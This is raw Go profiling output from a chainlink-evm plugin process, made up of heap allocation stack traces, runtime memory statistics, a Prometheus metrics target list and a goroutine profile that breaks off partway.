1: 6144 [1: 6144] @ 0x48e86c 0x494207 0x6bf12a 0x6bf169 0x6be85c 0x6beacf 0x6be832 0x6beacf 0x6be832 0x6beacf 0x6be832 0x6beacf 0x6be832 0x6beacf 0x6be832 0x6beacf 0x6be9ed 0x6be5a6 0x6beacf 0x6be9ed 0x6be5a6 0x6beacf 0x6bd78b 0x6d2157 0x6d2c6c 0x6d2c60 0x168ae3e 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6bf129 regexp/syntax.(*compiler).inst+0x89 /usr/local/go/src/regexp/syntax/compile.go:164
# 0x6bf168 regexp/syntax.(*compiler).quest+0xc8 /usr/local/go/src/regexp/syntax/compile.go:220
# 0x6be85b regexp/syntax.(*compiler).compile+0xf3b /usr/local/go/src/regexp/syntax/compile.go:137
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be831 regexp/syntax.(*compiler).compile+0xf11 /usr/local/go/src/regexp/syntax/compile.go:137
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be831 regexp/syntax.(*compiler).compile+0xf11 /usr/local/go/src/regexp/syntax/compile.go:137
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be831 regexp/syntax.(*compiler).compile+0xf11 /usr/local/go/src/regexp/syntax/compile.go:137
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be831 regexp/syntax.(*compiler).compile+0xf11 /usr/local/go/src/regexp/syntax/compile.go:137
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be831 regexp/syntax.(*compiler).compile+0xf11 /usr/local/go/src/regexp/syntax/compile.go:137
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be9ec regexp/syntax.(*compiler).compile+0x10cc /usr/local/go/src/regexp/syntax/compile.go:154
# 0x6be5a5 regexp/syntax.(*compiler).compile+0xc85 /usr/local/go/src/regexp/syntax/compile.go:129
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be9ec regexp/syntax.(*compiler).compile+0x10cc /usr/local/go/src/regexp/syntax/compile.go:154
# 0x6be5a5 regexp/syntax.(*compiler).compile+0xc85 /usr/local/go/src/regexp/syntax/compile.go:129
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6bd78a regexp/syntax.Compile+0x12a /usr/local/go/src/regexp/syntax/compile.go:74
# 0x6d2156 regexp.compile+0x76 /usr/local/go/src/regexp/regexp.go:176
# 0x6d2c6b regexp.Compile+0x2b /usr/local/go/src/regexp/regexp.go:131
# 0x6d2c5f regexp.MustCompile+0x1f /usr/local/go/src/regexp/regexp.go:311
# 0x168ae3d github.com/russross/blackfriday/v2.init+0x13d /go/pkg/mod/github.com/russross/blackfriday/v2@v2.1.0/inline.go:41
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 9472 [1: 9472] @ 0x48e86c 0x493c69 0x765a91 0x765a0a 0x76233e 0x7ea07a 0xf39485 0xf38daf 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x765a90 google.golang.org/protobuf/internal/filedesc.(*File).initDecls+0x110 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_init.go:51
# 0x765a09 google.golang.org/protobuf/internal/filedesc.newRawFile+0x89 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_init.go:29
# 0x76233d google.golang.org/protobuf/internal/filedesc.Builder.Build+0x11d /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/build.go:105
# 0x7ea079 google.golang.org/protobuf/internal/filetype.Builder.Build+0x199 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filetype/build.go:138
# 0xf39484 github.com/smartcontractkit/chainlink-protos/cre/go/sdk.file_sdk_v1alpha_sdk_proto_init+0x6c4 /go/pkg/mod/github.com/smartcontractkit/chainlink-protos/cre/go@v0.0.0-20260622152157-c8e129347b8b/sdk/sdk.pb.go:2768
# 0xf38dae github.com/smartcontractkit/chainlink-protos/cre/go/sdk.init.0+0xe /go/pkg/mod/github.com/smartcontractkit/chainlink-protos/cre/go@v0.0.0-20260622152157-c8e129347b8b/sdk/sdk.pb.go:2711
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 12288 [1: 12288] @ 0x48e86c 0x494207 0x6be631 0x6be679 0x6be5bf 0x6be788 0x6beacf 0x6be5a6 0x6beacf 0x6be5a6 0x6be832 0x6beacf 0x6be5a6 0x6beacf 0x6be5a6 0x6be788 0x6beacf 0x6bd78b 0x6d2157 0x6d2c6c 0x6d2c60 0xfb81b6 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6be630 regexp/syntax.(*compiler).inst+0xd10 /usr/local/go/src/regexp/syntax/compile.go:164
# 0x6be678 regexp/syntax.(*compiler).cap+0xd58 /usr/local/go/src/regexp/syntax/compile.go:179
# 0x6be5be regexp/syntax.(*compiler).compile+0xc9e /usr/local/go/src/regexp/syntax/compile.go:130
# 0x6be787 regexp/syntax.(*compiler).compile+0xe67 /usr/local/go/src/regexp/syntax/compile.go:133
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be5a5 regexp/syntax.(*compiler).compile+0xc85 /usr/local/go/src/regexp/syntax/compile.go:129
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be5a5 regexp/syntax.(*compiler).compile+0xc85 /usr/local/go/src/regexp/syntax/compile.go:129
# 0x6be831 regexp/syntax.(*compiler).compile+0xf11 /usr/local/go/src/regexp/syntax/compile.go:137
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be5a5 regexp/syntax.(*compiler).compile+0xc85 /usr/local/go/src/regexp/syntax/compile.go:129
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6be5a5 regexp/syntax.(*compiler).compile+0xc85 /usr/local/go/src/regexp/syntax/compile.go:129
# 0x6be787 regexp/syntax.(*compiler).compile+0xe67 /usr/local/go/src/regexp/syntax/compile.go:133
# 0x6beace regexp/syntax.(*compiler).compile+0x11ae /usr/local/go/src/regexp/syntax/compile.go:147
# 0x6bd78a regexp/syntax.Compile+0x12a /usr/local/go/src/regexp/syntax/compile.go:74
# 0x6d2156 regexp.compile+0x76 /usr/local/go/src/regexp/regexp.go:176
# 0x6d2c6b regexp.Compile+0x2b /usr/local/go/src/regexp/regexp.go:131
# 0x6d2c5f regexp.MustCompile+0x1f /usr/local/go/src/regexp/regexp.go:311
# 0xfb81b5 github.com/Masterminds/semver/v3.init.0+0x515 /go/pkg/mod/github.com/!masterminds/semver/v3@v3.5.0/constraints.go:241
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 16384 [1: 16384] @ 0x48e86c 0x493c69 0x765a91 0x765a0a 0x76233e 0x7ea07a 0xf28cb1 0xf2864f 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x765a90 google.golang.org/protobuf/internal/filedesc.(*File).initDecls+0x110 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_init.go:51
# 0x765a09 google.golang.org/protobuf/internal/filedesc.newRawFile+0x89 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_init.go:29
# 0x76233d google.golang.org/protobuf/internal/filedesc.Builder.Build+0x11d /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/build.go:105
# 0x7ea079 google.golang.org/protobuf/internal/filetype.Builder.Build+0x199 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filetype/build.go:138
# 0xf28cb0 github.com/smartcontractkit/chainlink-common/pkg/chains/solana.file_solana_proto_init+0x650 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/chains/solana/solana.pb.go:4616
# 0xf2864e github.com/smartcontractkit/chainlink-common/pkg/chains/solana.init.0+0xe /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/chains/solana/solana.pb.go:4571
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 18432 [1: 18432] @ 0x48e88c 0x493c69 0x1451467 0x14514e8 0x14526c5 0x1452607 0x1654f48 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x1451466 github.com/ethereum/go-ethereum/metrics.newExpDecaySampleHeap+0x46 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/metrics/sample.go:359
# 0x14514e7 github.com/ethereum/go-ethereum/metrics.NewExpDecaySample+0xc7 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/metrics/sample.go:152
# 0x14526c4 github.com/ethereum/go-ethereum/metrics.NewTimer+0x24 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/metrics/timer.go:45
# 0x1452606 github.com/ethereum/go-ethereum/metrics.NewRegisteredTimer+0x26 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/metrics/timer.go:32
# 0x1654f47 github.com/ethereum/go-ethereum/core/filtermaps.init+0x427 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/filtermaps/filtermaps.go:43
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 18432 [1: 18432] @ 0x48e88c 0x493c69 0x1451467 0x14514e8 0x1689325 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x1451466 github.com/ethereum/go-ethereum/metrics.newExpDecaySampleHeap+0x46 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/metrics/sample.go:359
# 0x14514e7 github.com/ethereum/go-ethereum/metrics.NewExpDecaySample+0xc7 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/metrics/sample.go:152
# 0x1689324 github.com/ethereum/go-ethereum/core/txpool/blobpool.init+0x524 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/txpool/blobpool/metrics.go:75
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 32768 [1: 32768] @ 0x48e893 0x493c69 0x6cbfbe 0x6cce7f 0x6cf057 0x6d4e08 0x6d7965 0x138fdac 0x13850ef 0x6dec0e 0x6dd7de 0x6de35b 0x6dd814 0x6df2e5 0x6dd7de 0x6de35b 0x6dd814 0x6dd03e 0x6dcc19 0x13837d8 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x19fbbe5 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6cbfbd regexp.(*bitState).reset+0xfd /usr/local/go/src/regexp/backtrack.go:91
# 0x6cce7e regexp.(*Regexp).backtrack+0x19e /usr/local/go/src/regexp/backtrack.go:317
# 0x6cf056 regexp.(*Regexp).doExecute+0x276 /usr/local/go/src/regexp/exec.go:535
# 0x6d4e07 regexp.(*Regexp).allMatches+0x127 /usr/local/go/src/regexp/regexp.go:758
# 0x6d7964 regexp.(*Regexp).FindAllStringSubmatch+0x64 /usr/local/go/src/regexp/regexp.go:1176
# 0x138fdab github.com/ethereum/go-ethereum/accounts/abi.NewType+0x62b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/type.go:119
# 0x13850ee github.com/ethereum/go-ethereum/accounts/abi.(*Argument).UnmarshalJSON+0x14e /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/argument.go:53
# 0x6dec0d encoding/json.(*decodeState).object+0x68d /usr/local/go/src/encoding/json/decode.go:610
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6df2e4 encoding/json.(*decodeState).object+0xd64 /usr/local/go/src/encoding/json/decode.go:767
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6dcc18 encoding/json.Unmarshal+0xf8 /usr/local/go/src/encoding/json/decode.go:113
# 0x13837d7 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x77 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:160
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x19fbbe4 github.com/smartcontractkit/chainlink-evm/pkg/client.init.0+0xc4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/client/simulated_backend_client.go:36
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 458752 [1: 458752] @ 0x48e893 0x4287c5 0xb1c085 0xb1c0ad 0xb26e18 0xb26cc6 0xb2dcd9 0xb2c270 0xb2bc0c 0xb26046 0x151876c 0x15185fa 0x15185fb 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xb1c084 go.uber.org/zap/zapcore.newCounters+0x44 /go/pkg/mod/go.uber.org/zap@v1.28.0/zapcore/sampler.go:41
# 0xb1c0ac go.uber.org/zap/zapcore.NewSamplerWithOptions+0x6c /go/pkg/mod/go.uber.org/zap@v1.28.0/zapcore/sampler.go:156
# 0xb26e17 go.uber.org/zap.Config.buildOptions.func1+0xf7 /go/pkg/mod/go.uber.org/zap@v1.28.0/config.go:289
# 0xb26cc5 go.uber.org/zap.Config.buildOptions.WrapCore.func5+0x25 /go/pkg/mod/go.uber.org/zap@v1.28.0/options.go:44
# 0xb2dcd8 go.uber.org/zap.optionFunc.apply+0x18 /go/pkg/mod/go.uber.org/zap@v1.28.0/options.go:38
# 0xb2c26f go.uber.org/zap.(*Logger).WithOptions+0xcf /go/pkg/mod/go.uber.org/zap@v1.28.0/logger.go:172
# 0xb2bc0b go.uber.org/zap.New+0x18b /go/pkg/mod/go.uber.org/zap@v1.28.0/logger.go:79
# 0xb26045 go.uber.org/zap.Config.Build+0x2e5 /go/pkg/mod/go.uber.org/zap@v1.28.0/config.go:254
# 0x151876b github.com/smartcontractkit/wsrpc/logger.(*Config).New+0x10b /go/pkg/mod/github.com/smartcontractkit/wsrpc@v0.8.5-0.20250502134807-c57d3d995945/logger/logger.go:64
# 0x15185f9 github.com/smartcontractkit/wsrpc/logger.New+0x19 /go/pkg/mod/github.com/smartcontractkit/wsrpc@v0.8.5-0.20250502134807-c57d3d995945/logger/logger.go:58
# 0x15185fa github.com/smartcontractkit/wsrpc/logger.init.0+0x1a /go/pkg/mod/github.com/smartcontractkit/wsrpc@v0.8.5-0.20250502134807-c57d3d995945/logger/logger.go:51
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
# runtime.MemStats
# Alloc = 11702176
# TotalAlloc = 22134376
# Sys = 28465416
# Lookups = 0
# Mallocs = 140040
# Frees = 100245
# HeapAlloc = 11702176
# HeapSys = 19824640
# HeapIdle = 4243456
# HeapInuse = 15581184
# HeapReleased = 1990656
# HeapObjects = 39795
# Stack = 1146880 / 1146880
# MSpan = 243040 / 261120
# MCache = 18368 / 32144
# BuckHashSys = 1464937
# GCSys = 4078320
# OtherSys = 1657375
# NextGC = 20698154
# LastGC = 1786604530594927831
# PauseNs = [82973 53654 47540 225233 62823 74485 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
# PauseEnd = [1786604466693970409 1786604466698386648 1786604466703413457 1786604466710021997 1786604466722448399 1786604530594927831 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
# NumGC = 6
# NumForcedGC = 0
# GCCPUFraction = 2.7811603305338357e-05
# DebugGC = false
# MaxRSS = 388292608
/usr/local/bin/chainlink-evm
[{"targets":["dba9c201fce7:6688"],"labels":{"__metrics_path__":"/metrics"}},{"targets":["dba9c201fce7:6688"],"labels":{"__meta_plugin_name":"evm.1337","__metrics_path__":"/plugins/evm.1337/metrics"}}]
goroutine profile: total 77
15 @ 0x49114e 0x46cf05 0xb6cf09 0x4994c1
# 0xb6cf08 github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1+0x68 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11
9 @ 0x49114e 0x41f5ae 0x41f0f2 0x756325 0x4994c1
# 0x756324 google.golang.org/grpc/internal/grpcsync.(*CallbackSerializer).run+0xe4 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:88
7 @ 0x49114e 0x46cf05 0xb66d90 0x4994c1
# 0xb66d8f github.com/smartcontractkit/chainlink-common/pkg/timeutil.(*Ticker).run+0xaf /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:29
3 @ 0x49114e 0x4521b7 0x490325 0x50e8c7 0x514525 0x51450d 0x5eda76 0x8db607 0x8db8d4 0x50368e 0x8cb1c5 0x8cb193 0x8cb88b 0x8ff5e5 0x8f215a 0x4994c1
# 0x490324 internal/poll.runtime_pollWait+0x84 /usr/local/go/src/runtime/netpoll.go:351
# 0x50e8c6 internal/poll.(*pollDesc).wait+0x26 /usr/local/go/src/internal/poll/fd_poll_runtime.go:84
# 0x514524 internal/poll.(*pollDesc).waitRead+0x124 /usr/local/go/src/internal/poll/fd_poll_runtime.go:89
# 0x51450c internal/poll.(*FD).RawRead+0x10c /usr/local/go/src/internal/poll/fd_unix.go:710
# 0x5eda75 net.(*rawConn).Read+0x35 /usr/local/go/src/net/rawconn.go:44
# 0x8db606 google.golang.org/grpc/internal/transport/readyreader.(*nonBlockingReader).ReadOnReady+0xa6 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:114
# 0x8db8d3 google.golang.org/grpc/internal/transport/readyreader.(*bufReadyReader).Read+0x173 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:221
# 0x50368d io.ReadAtLeast+0x8d /usr/local/go/src/io/io.go:335
# 0x8cb1c4 io.ReadFull+0x64 /usr/local/go/src/io/io.go:354
# 0x8cb192 golang.org/x/net/http2.readFrameHeader+0x32 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:250
# 0x8cb88a golang.org/x/net/http2.(*Framer).ReadFrameHeader+0x6a /go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:513
# 0x8ff5e4 google.golang.org/grpc/internal/transport.(*framer).readFrame+0x44 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http_util.go:493
# 0x8f2159 google.golang.org/grpc/internal/transport.(*http2Client).reader+0x1b9 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:1669
3 @ 0x49114e 0x46cf05 0x8ddf8a 0x8de758 0x8e80d2 0x4994c1
# 0x8ddf89 google.golang.org/grpc/internal/transport.(*controlBuffer).get+0x109 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:420
# 0x8de757 google.golang.org/grpc/internal/transport.(*loopyWriter).run+0x77 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:597
# 0x8e80d1 google.golang.org/grpc/internal/transport.NewHTTP2Client.func6+0xd1 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:471
2 @ 0x49114e 0x4521b7 0x490325 0x50e8c7 0x50faee 0x50fadc 0x51b54f 0x51b54a 0x544d57 0x9ea435 0x4994c1
# 0x490324 internal/poll.runtime_pollWait+0x84 /usr/local/go/src/runtime/netpoll.go:351
# 0x50e8c6 internal/poll.(*pollDesc).wait+0x26 /usr/local/go/src/internal/poll/fd_poll_runtime.go:84
# 0x50faed internal/poll.(*pollDesc).waitRead+0x2ad /usr/local/go/src/internal/poll/fd_poll_runtime.go:89
# 0x50fadb internal/poll.(*FD).Read+0x29b /usr/local/go/src/internal/poll/fd_unix.go:165
# 0x51b54e os.(*File).read+0x4e /usr/local/go/src/os/file_posix.go:30
# 0x51b549 os.(*File).Read+0x49 /usr/local/go/src/os/file.go:144
# 0x544d56 bufio.(*Reader).Read+0x196 /usr/local/go/src/bufio/bufio.go:245
# 0x9ea434 github.com/hashicorp/go-plugin.copyChan+0x1b4 /go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_stdio.go:184
2 @ 0x49114e 0x4521b7 0x490325 0x50e8c7 0x514525 0x51450d 0x5eda76 0x8db607 0x8db8d4 0x50368e 0x8cb1c5 0x8cb193 0x8cb88b 0x8ff5e5 0x8f7b3f 0x978568 0x977d36 0x4994c1
# 0x490324 internal/poll.runtime_pollWait+0x84 /usr/local/go/src/runtime/netpoll.go:351
# 0x50e8c6 internal/poll.(*pollDesc).wait+0x26 /usr/local/go/src/internal/poll/fd_poll_runtime.go:84
# 0x514524 internal/poll.(*pollDesc).waitRead+0x124 /usr/local/go/src/internal/poll/fd_poll_runtime.go:89
# 0x51450c internal/poll.(*FD).RawRead+0x10c /usr/local/go/src/internal/poll/fd_unix.go:710
# 0x5eda75 net.(*rawConn).Read+0x35 /usr/local/go/src/net/rawconn.go:44
# 0x8db606 google.golang.org/grpc/internal/transport/readyreader.(*nonBlockingReader).ReadOnReady+0xa6 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:114
# 0x8db8d3 google.golang.org/grpc/internal/transport/readyreader.(*bufReadyReader).Read+0x173 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:221
# 0x50368d io.ReadAtLeast+0x8d /usr/local/go/src/io/io.go:335
# 0x8cb1c4 io.ReadFull+0x64 /usr/local/go/src/io/io.go:354
# 0x8cb192 golang.org/x/net/http2.readFrameHeader+0x32 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:250
# 0x8cb88a golang.org/x/net/http2.(*Framer).ReadFrameHeader+0x6a /go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:513
# 0x8ff5e4 google.golang.org/grpc/internal/transport.(*framer).readFrame+0x44 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http_util.go:493
# 0x8f7b3e google.golang.org/grpc/internal/transport.(*http2Server).HandleStreams+0xfe /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:638
# 0x978567 google.golang.org/grpc.(*Server).serveStreams+0x367 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1059
# 0x977d35 google.golang.org/grpc.(*Server).handleRawConn.func1+0x55 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:993
2 @ 0x49114e 0x46cf05 0x19fe485 0x19fe843 0x4a4d0a 0x4994c1
# 0x19fe484 github.com/smartcontractkit/chainlink-framework/multinode.(*Poller[...]).pollingLoop+0xe4 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/poller.go:72
# 0x19fe842 github.com/smartcontractkit/chainlink-framework/multinode.(*Poller[...]).start.(*Engine).Go.func2+0x42 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72
# 0x4a4d09 sync.(*WaitGroup).Go.func1+0x49 /usr/local/go/src/sync/waitgroup.go:258
2 @ 0x49114e 0x46cf05 0x8ddf8a 0x8de758 0x8f4e9c 0x4994c1
# 0x8ddf89 google.golang.org/grpc/internal/transport.(*controlBuffer).get+0x109 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:420
# 0x8de757 google.golang.org/grpc/internal/transport.(*loopyWriter).run+0x77 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:597
# 0x8f4e9b google.golang.org/grpc/internal/transport.NewServerTransport.func3+0xdb /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:342
2 @ 0x49114e 0x46cf05 0x8fc265 0x4994c1
# 0x8fc264 google.golang.org/grpc/internal/transport.(*http2Server).keepalive+0x1e4 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:1203
2 @ 0x49114e 0x46cf05 0xb693a5 0xb69283 0x4a4d0a 0x4994c1
# 0xb693a4 github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).GoTick.func1+0xe4 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:100
# 0xb69282 github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).GoTick.(*Engine).Go.func2+0x42 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72
# 0x4a4d09 sync.(*WaitGroup).Go.func1+0x49 /usr/local/go/src/sync/waitgroup.go:258
1 @ 0x425b49 0x493a78 0x994d73 0x4994c1
# 0x493a77 os/signal.signal_recv+0x97 /usr/local/go/src/runtime/sigqueue.go:152
# 0x994d72 os/signal.loop+0x12 /usr/local/go/src/os/signal/signal_unix.go:23
